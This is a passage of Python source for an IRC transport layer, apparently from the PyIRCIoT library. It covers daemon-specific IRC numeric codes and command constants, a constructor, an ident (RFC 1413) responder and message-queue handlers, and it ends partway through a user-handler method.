RPL_USERIP = "340"
RPL_INVITING = "341"
RPL_SUMMONING = "342"
RPL_INVITED = "345" # GameSurge only?
if irc_default_draft in [ "Unreal", "ratbox", "seven", \
"Bahamut", "Charybdis", "hybrid", "plexus" ]:
RPL_INVITELIST = "346"
RPL_ENDOFINVITELIST = "347"
RPL_EXCEPTLIST = "348"
RPL_ENDOFEXCEPTLIST = "349"
RPL_VERSION = "351"
RPL_WHOREPLY = "352"
RPL_NAMREPLY = "353"
if irc_default_draft == "Bahamut":
RPL_RWHOREPLY = "354"
elif irc_default_draft in [ "ircu", "seven", \
"Charybdis", "snircd" ]:
RPL_WHOSPCRPL = "354"
if irc_default_draft in ircd_iu_sn:
RPL_DELNAMREPLY = "355"
RPL_KILLDONE = "361"
RPL_CLOSING = "362"
RPL_CLOSEEND = "363"
RPL_LINKS = "364"
RPL_ENDOFLINKS = "365"
RPL_ENDOFNAMES = "366"
RPL_BANLIST = "367"
RPL_ENDOFBANLIST = "368"
RPL_ENDOFWHOWAS = "369"
RPL_INFO = "371"
RPL_MOTD = "372"
RPL_INFOSTART = "373"
RPL_ENDOFINFO = "374"
RPL_MOTDSTART = "375"
RPL_ENDOFMOTD = "376"
RPL_MOTD2 = "377" # Unknown
RPL_AUSTMOTD = "378" # Austnet?
if irc_default_draft == "Unreal":
RPL_WHOISMODES = "379"
RPL_YOUREOPER = "381"
RPL_REHASHING = "382"
if irc_default_draft in [ "Unreal", "IRCNet", "RFC2812" ]:
RPL_YOURESERVICE = "383"
RPL_MYPORTIS = "384"
if irc_default_draft in [ "Unreal", "Bahamut", "IRCNet", \
"Charybdis", "seven", "ratbox" ]:
RPL_NOTOPERANYMORE = "385"
if irc_default_draft == "Unreal":
RPL_QLIST = "386"
RPL_ENDOFQLIST = "387"
RPL_ALIST = "388"
RPL_ENDOFALIST = "389"
RPL_TIME = "391"
RPL_USERSSTART = "392"
RPL_USERS = "393"
RPL_ENDOFUSERS = "394"
RPL_NOUSERS = "395"
if irc_default_draft == "ircu":
RPL_HOSTHIDDEN = "396"
ERR_UNKNOWNERROR = "400" # Unknown
ERR_NOSUCHNICK = "401"
ERR_NOSUCHSERVER = "402"
ERR_NOSUCHCHANNEL = "403"
ERR_CANNOTSENDTOCHAN = "404"
ERR_TOOMANYCHANNELS = "405"
ERR_WASNOSUCHNICK = "406"
ERR_TOOMANYTARGETS = "407"
if irc_default_draft == "Unreal":
ERR_NOSUCHSERVICE = "408"
ERR_NOORIGIN = "409"
if irc_default_draft in ircd_iu_sn:
ERR_UNKNOWNCAPCMD = "410"
else:
ERR_INVALIDCAPCMD = "410"
ERR_NORECIPIENT = "411"
ERR_NOTEXTTOSEND = "412"
ERR_NOTOPLEVEL = "413"
ERR_WILDTOPLEVEL = "414"
if irc_default_draft == "RFC2812":
ERR_BADMASK = "415"
if irc_default_draft in ircd_iu_sn:
ERR_QUERYTOOLONG = "416"
elif irc_default_draft == "IRCNet":
ERR_TOOMANYMATCHES = "416"
if irc_add_v3 in irc_additional_drafts:
ERR_INPUTTOOLONG = "417"
ERR_UNKNOWNCOMMAND = "421"
ERR_NOMOTD = "422"
ERR_NOADMININFO = "423"
ERR_FILEERROR = "424"
if irc_default_draft == "Unreal":
ERR_NOOPERMOTD = "425"
elif irc_default_draft == "Bahamut":
ERR_TOOMANYAWAY = "429"
ERR_NONICKNAMEGIVEN = "431"
ERR_ERRONEUSNICKNAME = "432"
ERR_NICKNAMEINUSE = "433"
if irc_default_draft == "Unreal":
ERR_NORULES = "434"
if irc_default_draft in [ "Unreal", "IRCNet" ]:
ERR_SERVICECONFUSED = "435"
ERR_NICKCOLLISION = "436"
if irc_default_draft in [ "Charybdis", "RFC2812", \
"hybrid", "IRCNet", "ratbox", "seven" ]:
ERR_UNAVAILRESOURCE = "437"
if irc_default_draft == "ircu":
ERR_BANNICKCHANGE = "437"
ERR_NICKCHANGETOOFAST = "438"
if irc_default_draft in [ "Unreal", "Charybdis", \
"hybrid", "ratbox", "seven", "plexus", "snircd" ]:
ERR_NICKTOOFAST = "438"
if irc_default_draft in [ "ircu", "Bahamut", "Unreal", \
"plexus", "snircd" ]:
ERR_TARGETTOOFAST = "439"
if irc_default_draft == "Bahamut":
ERR_SERVICESDOWN = "440"
ERR_USERNOTINCHANNEL = "441"
ERR_NOTONCHANNEL = "442"
ERR_USERONCHANNEL = "443"
ERR_NOLOGIN = "444"
ERR_SUMMONDISABLED = "445"
ERR_USERSDISABLED = "446"
if irc_default_draft in [ "Unreal", "Insp" ]:
ERR_NONICKCHANGE = "447"
ERR_NOTREGISTERED = "451"
if irc_default_draft == "Unreal":
ERR_HOSTILENAME = "455"
ERR_NOHIDING = "459"
ERR_NOTFORHALFOPS = "460"
ERR_NEEDMOREPARAMS = "461"
ERR_ALREADYREGISTERED = "462"
ERR_NOPERMFORHOST = "463"
ERR_PASSWDMISMATCH = "464"
ERR_YOUREBANNEDCREEP = "465"
ERR_YOUWILLBEBANNED = "466"
ERR_KEYSET = "467"
if irc_default_draft in ircd_iu_sn:
ERR_INVALIDUSERNAME = "468"
if irc_default_draft == "Unreal":
ERR_LINKSET = "469"
if irc_default_draft in ircd_Un_Ch_se:
ERR_LINKCHANNEL = "470"
ERR_CHANNELISFULL = "471"
ERR_UNKNOWNMODE = "472"
ERR_INVITEONLYCHAN = "473"
ERR_BANNEDFROMCHAN = "474"
ERR_BADCHANNELKEY = "475"
ERR_BADCHANNELMASK = "476"
if irc_default_draft in ircd_iu_Un_Ba:
ERR_NEEDREGGEDNICK = "477"
if irc_default_draft == "RFC2812":
ERR_NOCHANMODES = "477"
ERR_BANLISTFULL = "478"
if irc_default_draft == "pircd":
ERR_SECUREONLYCHANNEL = "479"
if irc_default_draft == "Unreal":
ERR_LINKFAIL = "479"
ERR_CANNOTKNOCK = "480"
ERR_NOPRIVILEGES = "481"
ERR_CHANOPRIVSNEEDED = "482"
ERR_CANTKILLSERVER = "483"
if irc_default_draft == "ircu":
ERR_ISCHANSERVICE = "484"
elif irc_default_draft in [ "RFC2812", "hybrid", "IRCNet" ]:
ERR_RESTRICTED = "484"
if irc_default_draft == "Unreal":
ERR_ATTACKDENY = "484"
ERR_KILLDENY = "485"
else:
ERR_UNIQOPPRIVSNEEDED = "485" # Unknown
if irc_default_draft == "unreal":
ERR_HTMDISABLED = "486"
if irc_default_draft == "IRCNet":
ERR_CHANTOORECENT = "487"
ERR_TSLESSCHAN = "488"
elif irc_default_draft == "Bahamut":
ERR_NOSSL = "488"
if irc_default_draft == "Unreal":
ERR_SECUREONLYCHAN = "489"
ERR_NOSWEAR = "490"
ERR_NOOPERHOST = "491"
ERR_NOSERVICEHOST = "492"
ERR_UMODEUNKNOWNFLAG = "501"
ERR_USERSDONTMATCH = "502"
if irc_default_draft in ircd_iu_Un_Ba_sn:
ERR_SILELISTFULL = "511"
if irc_default_draft in ircd_iu_sn:
ERR_NOSUCHGLINE = "512"
else:
ERR_TOOMANYWATCH = "512" # Unknown
if irc_default_draft in ircd_iu_sn:
ERR_BADPING = "513"
else:
ERR_NOSUCHGLINE = "513"
if irc_default_draft == "Unreal":
ERR_NEEDPONG = "513"
ERR_NOINVITE = "518"
ERR_ADMONLY = "519"
ERR_OPERONLY = "520"
ERR_LISTSYNTAX = "521"
ERR_WHOSYNTAX = "522"
ERR_WHOLIMEXCEED = "523"
ERR_OPERSPVERIFY = "524"
if irc_default_draft in ircd_Un_Ba:
RPL_LOGON = "600"
RPL_LOGOFF = "601"
if irc_default_draft == "Unreal":
RPL_WATCHOFF = "602"
RPL_WATCHSTAT = "603"
elif irc_default_draft == "Bahamut":
RPL_NOWON = "604"
RPL_NOWOFF = "605"
if irc_default_draft == "Unreal":
RPL_WATCHLIST = "606"
RPL_ENDOFWATCHLIST = "607"
RPL_MAPMORE = "610"
if irc_default_draft in ircd_Un_Ba:
RPL_DCCSTATUS = "617"
if irc_default_draft == "Unreal":
RPL_DUMPING = "640"
RPL_DUMPRPL = "641"
RPL_EODUMP = "642"
RPL_SPAMCMDFWD = "659"
if irc_default_draft == "Kine":
RPL_TRACEROUTE_HOP = "660"
RPL_TRACEROUTE_START = "661"
RPL_MODECHANGEWARN = "662"
RPL_CHANREDIR = "663"
RPL_SERVMODEIS = "664"
RPL_OTHERUMODEIS = "665"
if irc_add_v3 in irc_additional_drafts:
RPL_STARTTLS = "670"
if irc_default_draft == "Kine":
RPL_WHOISSTAFF = "689"
RPL_WHOISLANGUAGE = "690"
if irc_default_draft == "ratbox":
RPL_MODLIST = "702"
RPL_ENDOFMODLIST = "703"
RPL_HELPSTART = "704"
RPL_HELPTXT = "705"
RPL_ENDOFHELP = "706"
RPL_ETRACEFULL = "708"
RPL_ETRACE = "709"
RPL_KNOCK = "710"
RPL_KNOCKDLVR = "711"
ERR_TOOMANYKNOCK = "712"
ERR_CHANOPEN = "713"
ERR_KNOCKONCHAN = "714"
ERR_KNOCKDISABLED = "715"
RPL_TARGUMODEG = "716"
RPL_TARGNOTIFY = "717"
RPL_UMODEGMSG = "718"
RPL_OMOTDSTART = "720"
RPL_OMOTD = "721"
RPL_ENDOFOMOTD = "722"
ERR_NOPRIVS = "723"
RPL_TESTMARK = "724"
RPL_TESTLINE = "725"
RPL_NOTESTLINE = "726"
if irc_default_draft in ircd_Ch_se_ra_pl:
RPL_TESTMASK = "724"
RPL_TESTLINE = "725"
RPL_NOTESTLINE = "726"
if irc_default_draft == "plexus":
RPL_ISCAPTURED = "727"
if irc_default_draft in ircd_Ch_se_ra:
RPL_TESTMASKGECOS = "727"
if irc_default_draft == "plexus":
RPL_ISUNCAPTURED = "728"
if irc_default_draft in ircd_Ch_se:
RPL_QUIETLIST = "728"
RPL_ENDOFQUIETLIST = "729"
if irc_default_draft in ircd_Ch_se_ra:
RPL_MONONLINE = "730"
RPL_MONOFFLINE = "731"
RPL_MONLIST = "732"
RPL_ENDOFMONLIST = "733"
ERR_MONLISTFULL = "734"
RPL_RSACHALLENGE2 = "740"
RPL_ENDOFRSACHALLNGE2 = "741"
if irc_default_draft in ircd_Un_Ch_se:
ERR_MLOCKRESTRICTED = "742"
if irc_default_draft in ircd_Ch_se:
ERR_INVALIDBAN = "743"
ERR_TOPICLOCK = "744"
RPL_SCANMATCHED = "750"
RPL_SCANUMODES = "751"
if irc_default_draft == "IRCNet":
RPL_ETRACEEND = "759"
if irc_add_plus in irc_additional_drafts:
RPL_SERVICES_SUPPORTS_IRCPLUS = "800"
RPL_SERVICES_NEEDPASS = "801"
RPL_SERVICES_PASSOK = "802"
RPL_SERVICES_BADPASS = "803"
RPL_SERVICES_COMMAND_SUCCESS = "804"
RPL_SERVICES_COMMAND_ERROR = "805"
RPL_SERVICES_INFO = "806"
RPL_SERVICES_INFO_END = "807"
RPL_SERVICES_ERROR_NEEDREGISTRATION = "808"
RPL_SERVICES_NICKSTATUS = "809"
RPL_SERVICES_MEMO_READ = "810"
RPL_SERVICES_HELP_START = "811"
RPL_SERVICES_HELP = "812"
RPL_SERVICES_HELP_END = "813"
RPL_SERVICES_LIST_START = "814"
RPL_SERVICES_LIST = "815"
RPL_SERVICES_LIST_END = "816"
RPL_SERVICES_GLIST_START = "817"
RPL_SERVICES_GLIST = "818"
RPL_SERVICES_GLIST_END = "819"
RPL_SERVICES_MEMO_START = "820"
RPL_SERVICES_MEMO = "821"
RPL_SERVICES_MEMO_END = "822"
RPL_SERVICES_CHANSERV_CHANKEY = "823"
if irc_default_draft == "PyIRCIoT":
RPL_JSON = "851"
if irc_default_draft in ircd_Un_Ch_se:
RPL_LOGGEDIN = "900"
RPL_LOGGEDOUT = "901"
ERR_NICKLOCKED = "902"
RPL_SASLSUCCESS = "903"
if irc_add_v3 in irc_additional_drafts:
ERR_SASLFAIL = "904"
ERR_SASLTOOLONG = "905"
ERR_SASLABORTED = "906"
ERR_SASLALREADY = "907"
if irc_default_draft in ircd_Ch_se:
RPL_SASLMECHS = "908"
if irc_default_draft == "Insp":
RPL_AUTOOPLIST = "910"
RPL_ENDOFAUTOOPLIST = "911"
ERR_WORDFILTERED = "936"
RPL_SPAMFILTERLIST = "940"
ERR_ENDOFSPAMFILTERLIST = "941"
RPL_EXEMPTCHANOPSLIST = "953"
ERR_ENDOFEXEMPTCHANOPSLIST = "954"
if irc_default_draft in [ "Unreal", "plexus" ]:
ERR_CANNOTDOCOMMAND = "972"
elif irc_default_draft == "Insp":
ERR_CANTUNLOADMODULE = "972"
RPL_UNLOADEDMODULE = "973"
ERR_CANTLOADMODULE = "974"
RPL_LOADEDMODULE = "975"
elif irc_default_draft == "Bahamut":
ERR_NUMERICERROR = "999"
#
# v this set will be regrouped ...
#
cmd_ADMIN = "ADMIN"
cmd_AWAY = "AWAY"
cmd_CACTION = "CACTION"
cmd_CCLIENTINF = "CCLIENTINFO"
cmd_CDCC = "CDCC"
cmd_CERRMSG = "CERRMSG"
cmd_CFINGER = "CFINGER"
cmd_CHAT = "CHAT"
cmd_CPING = "CPING"
cmd_CRCLIENTIN = "CRCLIENTINFO"
cmd_CRFINGER = "CRFINGER"
cmd_CRPING = "CRPING"
cmd_CRTIME = "CRTIME"
cmd_CRUSERINFO = "CRUSERINFO"
cmd_CSOURCE = "CSOURCE"
cmd_CTCP = "CTCP"
cmd_CTCPREPLY = "CTCPREPLY"
cmd_CTIME = "CTIME"
cmd_CUSERINFO = "CUSERINFO"
cmd_CVERSION = "CVERSION"
cmd_DCC_CLOSE = "DCC_CLOSE"
cmd_DCC_CON = "DCC_CONNECT"
cmd_DCC_DISCON = "DCC_DISCONNECT"
cmd_DCC_MSG = "DCCMSG"
cmd_DCC_OPEN = "DCC_OPEN"
cmd_DCC_UPDATE = "DCC_UPDATE"
cmd_DISCONNECT = "DISCONNECT"
cmd_ERROR = "ERROR"
cmd_INFO = "INFO"
cmd_INVITE = "INVITE"
cmd_ISON = "ISON"
cmd_JOIN = "JOIN"
cmd_KICK = "KICK"
cmd_KILL = "KILL"
cmd_LEAVING = "LEAVING"
cmd_LINKS = "LINKS"
cmd_LIST = "LIST"
cmd_MODE = "MODE"
cmd_MOTD = "MOTD"
cmd_MSG = "MSG"
cmd_NAMES = "NAMES"
cmd_NICK = "NICK"
cmd_NOTICE = "NOTICE"
cmd_NJOIN = "NJOIN"
cmd_OPER = "OPER"
cmd_PART = "PART"
cmd_PASS = "PASS"
cmd_PING = "PING"
cmd_PONG = "PONG"
cmd_PRIVMSG = "PRIVMSG"
cmd_PRIVNOTICE = "PRIVNOTICE"
cmd_PUBLIC = "PUBLIC"
cmd_PUBMSG = "PUBMSG"
cmd_PUBNOTICE = "PUBNOTICE"
cmd_REHASH = "REHASH"
cmd_RESTART = "RESTART"
cmd_QUIT = "QUIT"
cmd_SERVER = "SERVER"
cmd_SQUIT = "SQUIT"
cmd_STATS = "STATS"
cmd_SUMMON = "SUMMON"
cmd_TIME = "TIME"
cmd_TOPIC = "TOPIC"
cmd_TRACE = "TRACE"
cmd_UMODE = "UMODE"
cmd_USER = "USER"
cmd_USERS = "USERS"
cmd_USERHOST = "USERHOST"
cmd_VERSION = "VERSION"
cmd_WALLOPS = "WALLOPS"
cmd_WHOIS = "WHOIS"
cmd_WHOWAS = "WHOWAS"
cmd_WHO = "WHO"
if irc_default_draft == "ircu":
cmd_ACCOUNT = "ACCOUNT"
cmd_CLARMODE = "CLEARMODE"
cmd_CLOSE = "CLOSE"
cmd_CNOTICE = "CNOTICE"
cmd_CONNECT = "CONNECT"
cmd_CPRIVMSG = "CPRIVMSG"
cmd_CREATE = "CREATE"
cmd_DESTRUCT = "DESTRUCT"
cmd_DESYNCH = "DESYNCH"
cmd_DIE = "DIE"
cmd_GLINE = "GLINE"
cmd_HASH = "HASH"
cmd_HELP = "HELP"
cmd_JUPE = "JUPE"
cmd_LUSERS = "LUSERS"
cmd_MAP = "MAP"
cmd_OPMODE = "OPMODE"
cmd_PRIVS = "PRIVS"
cmd_PROTO = "PROTO"
cmd_RESET = "RESET"
cmd_RPING = "RPING"
cmd_RPONG = "RPONG"
cmd_SET = "SET"
cmd_SETTIME = "SETTIME"
cmd_SILENCE = "SILENCE"
cmd_UPING = "UPING"
cmd_USERIP = "USERIP"
cmd_WALLCHOPS = "WALLCHOPS"
cmd_WALLUSERS = "WALLUSERS"
cmd_WALLVOICE = "WALLVOICE"
if irc_add_v3 in irc_additional_drafts:
cmd_ACC = "ACC"
cmd_AUTHENTICATE = "AUTHENTICATE"
cmd_BATCH = "BATCH"
cmd_CAP = "CAP"
cmd_FAIL = "FAIL"
#cmd_MAXLINE = "MAXLINE" (line-length-3.3)
cmd_SETNAME = "SETNAME"
cmd_STARTTLS = "STARTTLS"
cmd_TAGMSG = "TAGMSG"
cmd_WARN = "WARN"
cmd_WEBIRC = "WEBIRC"
cmd_MULTILINE_MAX_BYTES = "MULTILINE_MAX_BYTES"
cmd_MULTILINE_MAX_LINES = "MULTILINE_MAX_LINES"
cmd_MULTILINE_INVALID = "MULTILINE_INVALID"
cmd_MULTILINE_INVALID_TARGET = "MULTILINE_INVALID_TARGET"
#
if irc_default_draft == "ircu":
feature_AWAYLEN = "AWAYLEN"
feature_CASEMAPPING = "CASEMAPPING"
if irc_default_draft == "ircu":
feature_CHANNELLEN = "CHANNELLEN"
feature_CHANMODES = "CHANMODES"
feature_CHANTYPES = "CHANTYPES"
if irc_default_draft == "ircu":
feature_CNOTICE = "CNOTICE"
feature_CPRIVMSG = "CPRIVMSG"
feature_MAXCHANLEN = "MAXCHANNELLEN"
feature_KICKLEN = "KICKLEN"
feature_MODES = "MODES"
feature_MAXCHANS = "MAXCHANNELS"
feature_MAXBNANS = "MAXBANS"
feature_MAXNICKLEN = "MAXNICKLEN"
feature_NETWORK = "NETWORK"
feature_NICKLEN = "NICKLEN"
feature_PREFIX = "PREFIX"
if irc_default_draft == "ircu":
feature_SILENCE = "SILENCE"
feature_STATUSMSG = "STATUSMSG"
feature_TOPICLEN = "TOPICLEN"
feature_USERIP = "USERIP"
feature_WALLCHOPS = "WALLCHOPS"
feature_WALLVOICES = "WALLVOICES"
feature_WHOX = "WHOX"
#
featt_EMPTY = 0
featt_FLAGS = 1
featt_STRING = 2
featt_NUMBER = 3
#
ident_default_ip = '0.0.0.0'
ident_default_port = 113
#
err_NOT_IRCIOT_NET = 2019
#
err_DESCRIPTIONS = irciot_shared_.CONST.err_DESCRIPTIONS
err_DESCRIPTIONS.update({
err_NOT_IRCIOT_NET : "Warning! Not an IRC-IoT network: '{}'"
})
#
def __setattr__(self, *_):
pass
def __init__(self, in_mode = None):
#
self.CONST = self.CONST()
#
super(PyLayerIRC, self).__init__()
#
self.irc_encoding = self.CONST.irc_default_encoding
self.irc_MTU = self.CONST.irc_default_MTU
#
self.__irc_nick_matcher \
= re.compile(self.CONST.irc_nick_regexp, re.IGNORECASE)
self.__irc_channel_matcher \
= re.compile(self.CONST.irc_channel_regexp, re.IGNORECASE)
#
self.__irc_nick = self.CONST.irc_default_nick
self.irc_user = self.irc_tolower_(self.CONST.irc_default_nick)
self.irc_info = self.CONST.irc_default_info
self.irc_quit = self.CONST.irc_default_quit
self.irc_nick_old = self.__irc_nick
self.irc_nick_base = self.__irc_nick
self.irc_nick_try = ""
#
self.irc_nick_length = self.CONST.irc_max_nick_length
self.irc_topic_length = self.CONST.irc_max_topic_length
#
self.irc_ssl = self.CONST.irc_default_ssl
self.irc_server = self.CONST.irc_default_server
self.irc_port = self.CONST.irc_default_port
if self.irc_ssl:
self.irc_port = self.CONST.irc_default_ssl_port
self.__irc_password = self.CONST.irc_default_password
self.irc_ident = self.CONST.irc_default_ident
#
# This variable is not used to connect; if you do not have a server name
# and want to connect by IP address, put its text value into self.irc_server
self.irc_server_ip = None
self.__irc_local_port = 0
self.irc_network_name = None
#
self.irc_proxy = None
if self.CONST.irc_default_proxy != None:
self.irc_proxy_server = self.CONST.irc_default_proxy_server
self.irc_proxy_port = self.CONST.irc_default_proxy_port
self.__irc_proxy_password = self.CONST.irc_default_proxy_password
#
self.irc_status = 0
self.__irc_recon = 1
self.irc_last = None
#
self.irc_servers = [ ( \
self.irc_server, self.irc_port, \
self.__irc_password, self.irc_ssl, 0, None ) ]
#
self.irc_proxies = []
if self.irc_proxy != None:
self.irc_proxies = [ ( \
self.irc_proxy_server, self.irc_proxy_port, \
self.__irc_proxy_password, 0, None ) ]
#
self.irc_channel = self.CONST.irc_default_channel
self.irc_chankey = self.CONST.irc_default_chankey
self.__join_retry = 0
self.__join_retry_max = self.CONST.irc_default_join_retry
#
self.__nick_pause = 0
#
# ( irc channel, irc channel key, join retry count )
self.irc_channels = [ ( \
self.irc_channel, self.irc_chankey, 0 ) ]
#
self.irc_users = self.CONST.irc_default_users
self.irc_anons = []
self.irc_nicks = []
#
self.irc_talk_with_strangers = \
self.CONST.irc_default_talk_with_strangers
self.irc_last_temporal_vuid = \
self.CONST.api_first_temporal_vuid
#
self.__irc_queue = [0, 0]
self.__irc_queue[self.CONST.irc_queue_input ] = Queue(maxsize=0)
self.__irc_queue[self.CONST.irc_queue_output ] = Queue(maxsize=0)
#
self.__irc_queue_lock = [0, 0]
self.__irc_queue_lock[self.CONST.irc_queue_input ] = False
self.__irc_queue_lock[self.CONST.irc_queue_output ] = False
#
self.irc_commands = []
self.irc_codes = []
self.irc_features = []
#
if in_mode in self.CONST.irc_layer_modes:
self.__irc_layer_mode = in_mode
else:
self.__irc_layer_mode = self.CONST.irc_default_mode
#
self.__irc_task = None
self.irc_run = False
self.irc_debug = self.CONST.irc_default_debug
#
self.__ident_task = None
self.ident_run = False
self.ident_ip = self.CONST.ident_default_ip
self.ident_port = self.CONST.ident_default_port
#
self.irc_mid_pipeline_size \
= self.CONST.irc_default_mid_pipeline_size
#
self.irc_silence_max = self.CONST.irc_default_silence
self.__irc_silence = 0
#
self.time_now = datetime.datetime.now()
self.__time_ping = self.time_now
self.__delta_time = 0
self.__delta_ping = 0
#
# Supporting eXtended WHO command:
self.__whox = False
# Supporting of WALLCHOPS command:
self.__wallchops = False
#
self.__os_name = self.get_os_name_()
#
self.update_irc_host_()
#
self.lang = self.CONST.hl_default
#
self.errors = self.CONST.err_DESCRIPTIONS
#
self.irciot_set_locale_(self.lang)
#
# End of __init__()
def update_irc_host_(self):
try:
my_ip = self.get_src_ip_by_dst_ip_(self.irc_server_ip)
my_host = self.dns_reverse_resolver_(my_ip)
if socket.gethostbyname(my_host) != my_ip:
my_host = None
except:
my_host = None
if my_host == None:
try:
my_host = socket.gethostname()
except:
my_host = "localhost";
self.irc_host = my_host
def ident_server_(self):
def ident_ok_():
if not self.irc_run:
self.ident_run = False
if not self.ident_run:
return False
return True
if not self.is_ip_address_(self.ident_ip):
return
if not self.is_ip_port_(self.ident_port):
return
while (self.ident_run):
try:
if self.is_ipv4_address_(self.ident_ip):
my_af_inet = socket.AF_INET
else:
my_af_inet = socket.AF_INET6
my_socket = socket.socket(my_af_inet, socket.SOCK_STREAM)
my_socket.settimeout(self.CONST.irc_ident_wait)
my_socket.bind((self.ident_ip, self.ident_port))
my_socket.listen(1)
except:
my_socket.close()
sleep(self.CONST.irc_default_wait)
if not ident_ok_():
break
continue
while (ident_ok_()):
try:
try:
my_conn, my_addr = my_socket.accept()
except:
break
if not ident_ok_():
break
if not my_addr[0] in [ self.irc_server_ip, '127.0.0.1', '::1' ]:
my_conn.close()
break
while (ident_ok_()):
my_ready = select.select([my_socket], [], [], 0)
if my_ready[0] == [] and ident_ok_():
my_data = my_conn.recv(self.CONST.irc_buffer_size \
).decode(self.irc_encoding)
if my_data:
for my_char in [ '\n', '\r', ' ' ]:
my_data = my_data.replace(my_char, '')
my_split = my_data.split(',')
my_ok = True
my_port = "{}".format(self.irc_port)
if my_split[0] == "" or my_split[1] != my_port:
break
if self.is_ip_port_(self.__irc_local_port):
my_port = "{}".format(self.__irc_local_port)
if my_split[0] != my_port:
my_ok = False
my_out = "{} , {} : ".format(my_split[0], my_split[1])
if my_ok:
my_out += "USERID : UNIX : {}\n".format(self.irc_user)
else:
my_out += "ERROR : NO-USER\n"
my_conn.send(bytes(my_out, self.irc_encoding))
self.ident_run = False
break
else:
break
else:
sleep(self.CONST.irc_micro_wait)
my_conn.close()
sleep(self.CONST.irc_micro_wait)
except:
my_conn.close()
sleep(self.CONST.irc_micro_wait)
try:
my_socket.close()
except:
pass
sleep(self.CONST.irc_micro_wait)
#
# End of ident_server_()
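# Illustrative ident (RFC 1413) exchange handled by ident_server_() above,
# with made-up port numbers: the IRC server connects to TCP port 113 and
# sends "50214 , 6667"; if 50214 is our local port and 6667 the IRC server
# port, the reply is "50214 , 6667 : USERID : UNIX : <irc_user>", otherwise
# "50214 , 6667 : ERROR : NO-USER".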
def start_IRC_(self):
if self.__irc_layer_mode in [
self.CONST.irc_mode_CLIENT,
self.CONST.irc_mode_SERVICE ]:
my_target = self.irc_process_client_
elif self.__irc_layer_mode == self.CONST.irc_mode_SERVER:
my_target = self.irc_process_server_
else:
return False
self.irc_run = True
self.__irc_task = threading.Thread(target = my_target)
self.__irc_task.start()
return True
#
# End of start_IRC_()
def stop_IRC_(self):
self.irc_run = False
self.ident_run = False
self.irc_debug = False
self.__irc_password \
= self.wipe_string_(self.__irc_password)
if self.CONST.irc_default_proxy != None:
self.__irc_proxy_password \
= self.wipe_string_(self.__irc_proxy_password)
sleep(self.CONST.irc_micro_wait)
self.irc_disconnect_()
self.stop_ident_()
if self.__irc_task != None:
sleep(self.CONST.irc_micro_wait)
try:
self.__irc_task.join()
except:
pass
#
# End of stop_IRC_()
def start_ident_(self):
#
self.ident_run = True
self.__ident_task = threading.Thread(target = self.ident_server_)
self.__ident_task.start()
#
# End of start_ident_()
def stop_ident_(self):
#
self.ident_run = False
if self.__ident_task != None:
sleep(self.CONST.irc_micro_wait)
try:
self.__ident_task.join()
except:
pass
def __del__(self):
self.stop_IRC_()
try:
import signal
signal.alarm(0)
except:
pass
def to_log_(self, msg):
if not self.irc_debug:
return
print(msg)
def irciot_protocol_version_(self):
return self.CONST.irciot_protocol_version
def irciot_library_version_(self):
return self.CONST.irciot_library_version
def irc_handler (self, in_compatibility, in_message_pack):
# Warning: interface may be changed
(in_protocol, in_library) = in_compatibility
if not self.irciot_protocol_version_() == in_protocol \
or not self.irciot_library_version_() == in_library:
return False
my_message_pack = in_message_pack
if isinstance(in_message_pack, tuple):
my_message_pack = [ in_message_pack ]
if isinstance(my_message_pack, list):
for my_pack in my_message_pack:
(my_message, my_vuid) = my_pack
self.irc_add_to_queue_( \
self.CONST.irc_queue_output, my_message, \
self.CONST.irc_micro_wait, my_vuid)
return True
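# A minimal usage sketch (the message text and VUID below are made up):
#   self.irc_handler((self.irciot_protocol_version_(),
#     self.irciot_library_version_()), [ ("{...json...}", "c1") ])
# Each (message, vuid) pair is placed on the output queue; the main IRC
# loop is expected to deliver it (the delivery code is outside this method).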
def user_handler (self, in_compatibility, in_action, in_vuid, in_params):
# Warning: interface may be changed
(in_protocol, in_library) = in_compatibility
if not self.irciot_protocol_version_() == in_protocol \
or not self.irciot_library_version_() == in_library \
or not isinstance(in_action, int) \
or not isinstance(in_vuid, str) \
or not (isinstance(in_params, str) or in_params == None):
return (False, None)
my_vt = None # VUID Type
my_user = None
my_anon = None
if in_vuid in self.CONST.api_vuid_not_srv:
my_vt = in_vuid
else:
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_cfg), in_vuid)
if my_re:
my_vt = self.CONST.api_vuid_cfg
my_user = self.irc_cfg_get_user_struct_by_vuid_(in_vuid)
if my_user != None:
( my_uid, my_mask, my_chan, my_opt, \
my_ekey, my_bkey, my_lmid, \
my_ekto, my_bkto, my_omid ) = my_user
else:
my_re = re.search("{}(\d+)".format( \
self.CONST.api_vuid_tmp), in_vuid)
if my_re:
my_vt = self.CONST.api_vuid_tmp
my_anon = self.irc_track_get_anons_by_vuid_(in_vuid)
if my_anon != None:
( an_id, an_mask, an_chan, an_opt, \
an_ekey, an_bkey, an_lmid, \
an_ekto, an_bkto, an_omid ) = my_anon
else:
return (False, None)
if in_action == self.CONST.api_GET_LMID:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_lmid)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_lmid)
elif in_action == self.CONST.api_SET_LMID:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, None, in_params, None, None, None)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, None, in_params, \
None, None, None)
elif in_action == self.CONST.api_GET_OMID:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_omid)
elif my_vt == self.CONST.api_vuid_tmp:
if my_anon != None:
return (True, an_omid)
elif in_action == self.CONST.api_SET_OMID:
if my_vt == self.CONST.api_vuid_cfg:
self.irc_track_update_ucfgs_by_vuid_(in_vuid, \
None, None, None, None, None, in_params)
elif my_vt == self.CONST.api_vuid_tmp:
self.irc_track_update_anons_by_vuid_(in_vuid, \
None, None, None, None, None, None, \
None, None, in_params)
elif in_action == self.CONST.api_GET_VUID:
if in_vuid in self.CONST.api_vuid_not_srv:
my_vuid_list = []
for my_nick in self.irc_nicks:
(in_nick, my_mask, my_vuid, my_info) = my_nick
if not self.irc_talk_with_strangers:
if my_vuid[0] != self.CONST.api_vuid_cfg:
continue
if my_vt in [
self.CONST.api_vuid_cfg,
self.CONST.api_vuid_tmp ]:
if my_vuid[0] != my_vt:
continue
my_vuid_list.append(my_vuid)
return (True, my_vuid_list)
elif in_action == self.CONST.api_GET_BKEY:
if my_vt == self.CONST.api_vuid_cfg:
if my_user != None:
return (True, my_bkey)
elif my_vt == self.CONST.api_vuid_tmp:
